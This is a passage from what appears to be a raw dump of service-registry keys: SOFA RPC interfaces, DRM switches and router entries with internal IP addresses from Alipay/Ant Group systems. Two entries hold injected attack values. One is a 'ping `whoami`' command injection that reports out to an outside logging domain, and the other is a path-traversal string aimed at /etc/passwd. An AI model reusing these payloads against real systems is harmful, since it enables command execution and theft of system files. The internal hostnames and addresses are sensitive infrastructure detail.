facade.crowd.CrowdValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PRESUBMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeco.acl.common.service.facade.IPackageSer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PRICECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.progov.service.amspm.api.AmspmDiggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.basicnamecontrol.BasicNameControlManagerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopPrincipalRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.DepositEvaluateRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.query.ProductRaiseStatusQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.TopBoothDrmResource.nomoQueryAppKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.biz.service.dynamiccode.DynamicCodeSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dchainprod.common.facade.query.AssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.huabei.facade.HuabeiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:opinioncore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniselfop.facade.api.miniplan.MiniFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.DeliveryDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ThingTopicAccessAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assay.common.facade.JobTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanBasicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.common.service.facade.agreement.facade.AgreementCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.profile.facade.StrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.qdb.TradeTrapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.AppstoreWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityWalkDonateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-redeem-generate.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcomment.common.service.facade.api.reply.ReplyQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.riskmng.core.engine.CoreEngineConfigResource.coreEngineProperty,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.plugin.common.service.facade.api.PluginSDKPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.biz.service.commission.api.CommissionRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","ofpgrowth@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.MerchantDataAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finriskcore.common.facade.riskmng.RiskParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.core.service.scheduler.SchedulerWorkerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.DcSceneTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:as@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizide.common.service.facade.api.BizArchetypeGenerateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchcenter.common.service.facade.MatchTradeDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.188.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgmng.common.service.facade.schema.SchemaConstraintService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditSceneProdBenefitFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ExecutionControlFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.inshealthprod.facade.HealthGiftQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcenter.common.dal.mdata.auto.daointerface.MdataChargeDateDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizOrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:salesplan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.isvdata.ServiceCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.switch2NewPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.PortfolioSpManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniunifydata.MiniDataChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.dynamic.biz.bank.spi.BankCommonPlatformSpiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.29.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.feature.FeatureStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapApiConsumerService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.meta.command.RmcDimensionHttpService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfquote.common.service.facade.api.InquiryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDMy.ssrf.noble.log.lynnshare.cc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:multiend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:insrenewprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ucdpmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bipgw.common.service.facade.DishonorVoucherNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antforest:name=com.alipay.antforest.core.drd.container.loaders.DrmConfigLoader.configs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.accm.facade.AccmOriginalTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfpayrcv.facade.api.ReceiveEngineAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.EntityRiskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiConfigureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.transform.DiseaseInfoTransformerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:changeiteration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.grscore.common.service.facade.api.recruit.RecruitResumeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.203.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.antlottery.AntLotterySummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.common.service.integration.taobao.TaobaoTopClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.custormerservicemanage.CustomerServiceResourceManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilerelation@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportWhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.openDataCollect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insiop_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.patternSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.integration.ebppgwv2.GetTripClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.252.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exclienttrdcenter.service.facade.api.ExchangeRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.MobileQrCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.item.ItemManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cstask.common.service.facade.CstaskBpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kwlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SMSGW_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresdb-console@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csvoice.service.facade.api.ProductSuggestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_OPEN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.client.qaZQueue52#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.MiniLoanOperateDrm.prodTransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.frastress.common.service.facade.api.bizindicator.BizKeyIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fop.bops.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finfundbankcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bstsolprod.npp.facade.NormPromoPosFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkdepbuss.common.facade.api.autodep.AccountTransLimitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCFRAMODEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.InsCharityAidedCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.creditledger.common.service.facade.api.CreditRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.commonSerialBlackConst,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.multimediabase.facade.scene.GroupProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.agency.PayCodeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.gold.PigRunningGoldManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.npp.facade.operate.BenefitOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.answer.facade.AnswerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:memberprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.org.RealStorePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.StreamJobService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.salesrecord.DailySalesRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.region.ZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insqa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.creditbizservice.service.facade.CreditBizServiceOperateInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.StatusbarTodoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifFixedQuerySwitcher.fixedMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.benefitcore.common.severless.facade.spi.paychecker.SpiBenefitSendOrderQueryFacade:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkfundportal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.uniqueKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue6#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprodapicore.facade.service.ApplicationServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwallet.wealth.drm.DRMResource.mwalletConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.zcache.log.fraudmng.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.hahaTest:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.money,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebpp.MiscConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.CheckFileManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\%2e%2e\\\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_send_2_audit_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.138.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.127.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxagg.common.service.facade.api.management.scene.AggSceneMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.sendUserLabelMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.core.service.cashforecast.engine.CashForecastTaskEngine:1.0:latestBalance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.workbench.WorkbenchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.MqDiagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.api.WorkDayCalculationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:recadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.publish.PublishSpi:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bcreconciliation.facade.api.TransItemRegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditcoop.common.service.facade.ApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_M_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbcateringorder.common.service.facade.api.order.merchant.CateringOrderForMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:claimOrderDownloadCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.StorageInfoMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.OdpsTaskMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mfinsecu@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-zdataquery-findecision-cluster#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_XX_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_CHARGE_MESSAGE_SENDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.0.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.console.GroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.callback.SchedulerCallbackService:1.0:instinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ZcbRepayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.certify.service.facade.CertifyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:cinspfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.roplib.core.model.drmdefense.DrmPublishProcessManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.pmcShineDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.icontrol.common.service.facade.dispatch.IcVdnDispatchConfigManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:asyncAsttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_EXCASHIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:salesLeadsTaskCancelExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:tallycore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.49.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.common.manage.facade.api.union.MerchantUnionOperationEnrollFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MERCHANT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.common.voucher.api.MinitransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.BusinesstypeMappingRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.face.FaceCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchasset_assetCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.selfNavigation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rescue.common.service.facade.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.4.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.outbound.facade.AgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intel.service.api.fund.EnforceWithdrawApplyFacade:1.0@XFIRE#@#D